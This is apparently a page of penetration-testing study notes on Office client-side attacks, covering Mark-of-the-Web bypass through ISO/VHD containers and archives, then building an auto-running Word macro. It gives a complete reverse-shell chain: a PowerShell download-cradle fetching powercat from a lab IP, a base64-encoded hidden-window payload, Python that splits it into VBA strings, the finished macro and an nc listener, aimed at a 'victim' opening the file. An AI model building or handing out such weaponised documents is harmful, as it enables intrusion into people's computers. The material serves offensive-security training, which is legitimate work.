Microsoft micros

Bypass Technique for Mark Of The Web (MOTW)

Container Formats (ISO, IMG, VHD): Do not support NTFS Alternate Data Streams (ADS), preventing files inside from inheriting the Mark-of-the-Web (MOTW).
Security Bypass: Inner files execute without MOTW-based security prompts, allowing malware delivery.
Compressed Archives (ZIP, 7z): Can support ADS but may bypass MOTW due to extraction tool behavior (e.g., 7-Zip previously did not honor MOTW by default).
Threat Actor Exploitation: Used to evade MOTW-based security measures and content scanners.
Key Takeaway: Encapsulation in certain formats helps malware evade detection and execute without warnings.

Making Macros in MS Word

Microsoft Office applications like Word and Excel allow users to embed macros, which are a series of commands and instructions grouped to accomplish a task programmatically.

The newer .docx file type cannot save macros without attaching a containing template. This means that we can run macros within .docx files but we can't embed or save the macro in the document. In other words, the macro is not persistent. Alternatively, we could also use the .docm file type for our embedded macro.

You need to open a Word file and save it in .docm file type.

To make macros, Goto View tab > macros.

Let's enter MyMacro as the name in the Macro Name section, then select the mymacro document from the Macros in drop-down menu. This document is where the macro will be saved. Finally, click Create to insert a simple macro framework into the document.

We will be presented with the below windows.

General structute of micro is presented to us.

Sub MyMacro()
'
' MyMacro Macro
'
'

End Sub

Since Office macros are not executed automatically, we must use the predefined AutoOpen macro and Document_Open event. These procedures can call a custom procedure to run code when a Word document is opened. They differ slightly depending on how Microsoft Word or the document is opened. Each covers specific cases that the other does not, which is why both are used.

Sub AutoOpen()

  MyMacro
  
End Sub

Sub Document_Open()

  MyMacro
  
End Sub

Sub MyMacro()

  CreateObject("Wscript.Shell").Run "powershell"
  
End Sub

Above code Macro automatically executes powershell.exe after opening the Document.

Reverse shell

We can get the reverse shell from a macro using powershell and Powercat.ps1.

PowerShell

IEX(New-Object System.Net.WebClient).DownloadString('http://192.168.45.212/powercat.ps1');powercat -c 192.168.45.212 -p 443 -e powershell
# Start Python server on the directory where powercat
# python3 -m http.server 80 -d /usr/share/windows-resources/powercat/

Encode the above command to base64 using the below method.

pwsh

$Text = "IEX(New-Object System.Net.WebClient).DownloadString('http://192.168.45.212/powercat.ps1');powercat -c 192.168.45.212 -p 443 -e powershell"

$Bytes = [System.Text.Encoding]::Unicode.GetBytes($Text)

$EncodedText =[Convert]::ToBase64String($Bytes)

$EncodedText

In many scripting or macro environments—especially VBA macros—there are limits on how long a single string literal can be or how many characters are allowed per line. Splitting a large base64-encoded command into smaller chunks ensures that you can work around those line-length or character-count restrictions, making the code valid and easier to handle within the macro environment. Additionally, splitting it into chunks can sometimes improve readability and maintainability of the script. So, We will split it using python code below.

Python3

str = "powershell.exe -nop -w hidden -e SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AMQA5ADIALgAxADYAOAAuADQANQAuADIAMQAyAC8AcABvAHcAZQByAGMAYQB0AC4AcABzADEAJwApADsAcABvAHcAZQByAGMAYQB0ACAALQBjACAAMQA5ADIALgAxADYAOAAuADQANQAuADIAMQAyACAALQBwACAANAA0ADMAIAAtAGUAIABwAG8AdwBlAHIAcwBoAGUAbABsAA=="

n = 50

for i in range(0, len(str), n):
	print("Str = Str + " + '"' + str[i:i+n] + '"')

python3 -c 'str = "powershell.exe -nop -w hidden -e SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AMQA5ADIALgAxADYAOAAuADQANQAuADIAMQAyAC8AcABvAHcAZQByAGMAYQB0AC4AcABzADEAJwApADsAcABvAHcAZQByAGMAYQB0ACAALQBjACAAMQA5ADIALgAxADYAOAAuADQANQAuADIAMQAyACAALQBwACAANAA0ADMAIAAtAGUAIABwAG8AdwBlAHIAcwBoAGUAbABsAA=="; n = 50; print("\n".join(["Str = Str + \"" + str[i:i+n] + "\"" for i in range(0, len(str), n)]))'

Final macro for a reverse shell.

Sub AutoOpen()
    MyMacro
End Sub

Sub Document_Open()
    MyMacro
End Sub

Sub MyMacro()
    Dim Str As String
    
    Str = Str + "powershell.exe -nop -w hidden -e SQBFAFgAKABOAGUAd"
    Str = Str + "wAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAA"
    Str = Str + "uAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhA"
    Str = Str + "GQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AMQA5ADI"
    Str = Str + "ALgAxADYAOAAuADQANQAuADIAMQAyAC8AcABvAHcAZQByAGMAY"
    Str = Str + "QB0AC4AcABzADEAJwApADsAcABvAHcAZQByAGMAYQB0ACAALQB"
    Str = Str + "jACAAMQA5ADIALgAxADYAOAAuADQANQAuADIAMQAyACAALQBwA"
    Str = Str + "CAANAA0ADMAIAAtAGUAIABwAG8AdwBlAHIAcwBoAGUAbABsAA="
    Str = Str + "="

    CreateObject("Wscript.Shell").Run Str
End Sub

CreateObject("Wscript.Shell").Run Str: This opens powershell and runs content stored in str variable.

Save this macro and start the listener.

sudo rlwrap nc -lnvp 443

Now When the victim opens the file and enables macros. You will get the shell.

If you are performing this on Lab then you need to run it manually.

PreviousClient Fingerprinting NextWindows Privilege escalation

Last updated 11 months ago